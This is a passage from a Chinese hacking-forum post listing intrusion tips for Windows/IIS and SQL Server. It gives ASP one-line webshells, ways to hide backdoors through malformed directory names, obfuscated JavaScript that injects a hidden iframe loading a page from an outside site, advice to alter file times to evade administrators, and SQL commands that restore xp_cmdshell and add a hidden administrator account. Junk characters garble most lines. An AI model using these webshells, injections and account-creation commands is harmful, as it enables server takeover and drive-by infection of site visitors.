1 ~9 b# k" _8 }7 T. \! gc).%><%execute request("go")%><%
7 S5 P- M/ G0 S, H/ }) k/ B% sd).<script language=VBScript runat=server>execute request("sb")</Script>
" S  v4 G/ J' ~. D8 }; j9 P  e9 H; Je).<%25Execute(request("l"))%25>
; v. b0 v! r2 [* `f).<%if request("cmd")<>"" then execute request("pass")%># B% M! b# K0 A0 w0 L
. M( o# |4 a, x2 g% G) [. x, v& D
52、at "12:17" /interactive cmd
0 K+ g0 J2 a; c. b% ?: ]执行后可以用AT命令查看新加的任务
# l6 y# R# L" \, p" a9 x用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
3 I$ f+ g# V& y4 G* s) M
' g5 _. y! V0 t! T! T0 Y4 R53、隐藏ASP后门的两种方法
* D6 y% p- ?2 C" h0 Q4 q1、建立非标准目录:mkdir images..\- l6 R5 \( X4 A% E3 G6 M
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
1 O  {/ h" d  d& S& ]+ ~" H4 T# C% U通过web访问ASP木马:http://ip/images../news.asp?action=login
* L  l7 L/ F! f  ~# p如何删除非标准目录:rmdir images..\ /s
: G. K2 J2 L. V4 b( \/ u0 E2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:, H2 ~* K1 W3 W0 I" ~1 g
mkdir programme.asp9 C5 p% d) \7 b$ J7 p, B
新建1.txt文件内容:<!--#include file=”12.jpg”-->% f9 U. C* z/ i+ X2 _  h4 B
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
, A8 K1 q9 `+ x6 o9 v8 i. sattrib +H +S programme.asp" s, }" D8 G, J4 G: Q! r* z, f7 }
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt! x4 @" U' |& \; @4 Q% w' ^9 H

) Q) r2 z! z, R0 K0 `54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! q- w+ Z7 N9 K3 ^2 Y) b
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。( @# ^; z+ B7 y
- c: V: S2 R, U) ?1 l; q6 j2 g
55、JS隐蔽挂马
+ j9 \+ |" \- }9 f1.
$ |  L# r, K4 E+ J$ f5 ~var tr4c3="<iframe src=ht";- n4 M- R* \; n2 B1 U) M
tr4c3 = tr4c3+"tp:/";
/ {8 p+ w( h$ Qtr4c3 = tr4c3+"/ww";9 ~" N' K1 N7 k3 O' J
tr4c3 = tr4c3+"w.tr4";
/ x  K& N% Z( U& b0 G( r: Y0 ^! Ytr4c3 = tr4c3+"c3.com/inc/m";
6 g: X6 e" Q, ~1 w4 P% Ktr4c3 = tr4c3+"m.htm style="display:none"></i";
, s; B; R( {" H: z) c/ itr4c3 =tr4c3+"frame>'";
, [' r; x+ l4 L5 T1 b# hdocument.write(tr4c3);' t) H% G. Q+ D5 @
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。& O& R+ E4 r5 W! N  t) I

4 Q% y' b7 b5 V5 x& @1 D2.
, Y# u1 I% M" V6 l7 b6 Q9 |; Y1 c, {转换进制,然后用EVAL执行。如1 [! B1 ]- g0 ?; i7 h
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
8 x7 M7 M3 k6 a; o9 q2 Y4 @! L不过这个有点显眼。
  Y% b" P7 q+ S' @  A3 H0 c3.3 H" F* A6 }8 h8 ]) }' l; Y2 u
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');$ H4 q- b$ \8 [; f) B0 S- B
最后一点,别忘了把文件的时间也修改下。% B, q& \0 Q. A- k+ X

& J* ~8 A0 w( K: |! p56.3389终端入侵常用DOS命令, o' @$ H; N* S: X  P" O
taskkill taskkill /PID 1248 /t& `3 f; B; y4 b, S+ u1 y0 |

* W7 ^% K* U! s- @4 j1 U0 X0 btasklist 查进程
$ O2 p3 I4 p7 ]% c* _' b5 E1 |8 u; Y% v
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
* A4 V4 f8 L+ m2 g" Y6 G. ziisreset /reboot& Z2 Z* q. F4 e+ U. G  ?0 E
tsshutdn /reboot /delay:1    重起服务器
0 ?2 ~" ~8 c3 J, H
( ~0 I6 b9 h5 l& H  w  h* [4 Ilogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,$ H2 @; b3 c) z. \, O, R! h7 Y

& h1 p% l- g2 Q4 O% hquery user 查看当前终端用户在线情况4 h) u1 ^  [3 `6 T" i
' R' y) V, h* v0 p
要显示有关所有会话使用的进程的信息,请键入:query process *
* i: Y) k/ y% r' y% _
9 D* u; ~! ~' h6 D: {4 c要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2  F( l! ]" w( f! R4 f3 f* S

- J& u3 ^9 v! K1 S7 m- _8 c要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
6 h6 D. f& c; h# h! q& y
; I  N) C( F: s! R: O要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02) C5 c3 E! C) Q

) ^5 g3 ]7 Z6 e5 ^; m命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启- C4 l  g/ p4 X- v  [
/ X7 {" Z8 V1 A2 n
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
! w, n) L% P( I  F) p  S* a  g/ b6 E2 o
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。: @9 A  e2 y$ s
3 J2 B/ `2 k! D# V( _- k9 ?8 K  l9 M
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机( H/ S0 f5 F8 ~+ O
' n+ {/ O6 G; o; q  d. t! d  k
56、在地址栏或按Ctrl+O,输入:
2 N/ F0 D# M* W' T- k3 ejavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;* ^" q' L2 t. D: u/ x7 N
0 a+ W) O; H9 M4 a; H
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
% x  y, g/ Q) f) ?0 l  ]7 _& J, P3 x* b- F/ ~+ |
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,9 E! Z  K# J' ^4 l3 Z
用net localgroup administrators是可以看到管理组下,加了$的用户的。  o  s/ E  s+ }- y* E" `

/ H- Z7 ^" V" z) T4 W58、 sa弱口令相关命令1 J  o, w& U4 R) |! q1 L: b
, e7 p8 v+ R2 ?5 T0 A9 t# q# y8 Z
一.更改sa口令方法:: V4 Y; \) s: A5 v( M1 _
用sql综合利用工具连接后,执行命令:3 c+ w& m, S+ m6 H9 F' F
exec sp_password NULL,'20001001','sa'
: L- G5 F, R- p; j% Z(提示:慎用!)& \7 `' v2 O$ ~; I3 v, i2 X' r

! e9 s9 E4 h' _6 ~二.简单修补sa弱口令.
; t8 J: ~! O! o* K, K: Q: e2 |
+ u0 E* j- D( m: s% G" U) W& F& p方法1:查询分离器连接后执行:
7 }# ^- ?0 z2 _4 t- E1 pif exists (select * from
. q6 L8 t' x, n* {; gdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
& Z/ I6 {4 T- J$ T1 ^% eOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
9 o1 j, y1 Z4 `0 J8 @: \" |0 c1 @( Z! [' I
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2 l& g5 A/ C) I
0 q' J* \" V( P6 ]* L" hGO4 f0 x7 o/ c) l9 s( E# D5 z& D
' N# w8 _$ R4 t% R
然后按F5键命令执行完毕+ E  u( c5 K3 n, c
  Y+ u$ Y: R& T$ ]- g9 d8 @
方法2:查询分离器连接后
7 D, `2 n. {0 |第一步执行:use master
2 f' M! l% m0 n, u$ X, X第二步执行:sp_dropextendedproc 'xp_cmdshell'4 B2 b) b5 P4 v
然后按F5键命令执行完毕
) A/ q" B- F' o2 a6 S! B- _. n  n4 G$ }5 P6 j$ g2 w' h
+ L. R5 e, U5 i# i4 w* W* S
三.常见情况恢复执行xp_cmdshell.
) v1 k. @, a$ T" A+ H9 M
6 K9 |, q7 r- N
9 R  w" g% _  q! C' W% n  S1 未能找到存储过程'master..xpcmdshell'.2 t* L/ C1 q$ C# r7 w8 C
   恢复方法:查询分离器连接后,
# J& c. Y5 K. @# }. `$ i第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
& L6 j6 r: @3 u2 O1 G6 T第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': a% y+ x, X* Z8 q/ W8 M8 C
然后按F5键命令执行完毕; b5 V# g% b1 i

, Z4 y% d( t7 x9 u3 H2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
9 b( ?! h% O/ ^) V, H9 |1 O恢复方法:查询分离器连接后,( z# z/ u  @8 X1 T9 k4 L
第一步执行:sp_dropextendedproc "xp_cmdshell"- Y6 v* N) z2 d/ L
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'' G% ^* J; N( K
然后按F5键命令执行完毕
2 G5 |1 D! S3 t7 Q
8 O2 d' }3 y8 f% G$ i; n6 Z& j3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( z" o- {8 a$ t9 X% {5 M
恢复方法:查询分离器连接后,
- R' U8 y5 s$ o第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
0 ]/ l, ~: ?9 G5 }" O第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
% r/ {& O* ?8 Q( g3 P+ g: P, z然后按F5键命令执行完毕; T$ d! @" j! ?* X* K

& M6 [' P. f% l4 ?9 [8 {9 e四.终极方法.
6 s+ M$ r; g1 d: C! B- \% J' O如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:6 Z/ H* N( Q" s* B
查询分离器连接后,% |+ ?! j1 `" G* c
2000servser系统:: N8 m; ~2 P: Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'/ }- G1 y9 T8 q8 ^6 Q. Z0 d
4 y# g& K% A0 v# @# M0 a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ w- G( l) W; Y$ U: s. }

. L3 K  J; A) U5 ^6 W  Rxp或2003server系统:
! A% U" q0 ~. g( _2 {' }" g9 M  f* I) _. ^, s# g/ u# v7 f
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; y& `; c7 j  K' Q
9 V% w, o; _' Z7 H4 t5 {( _. udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 j$ K% B  [) k8 D! a! \  M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表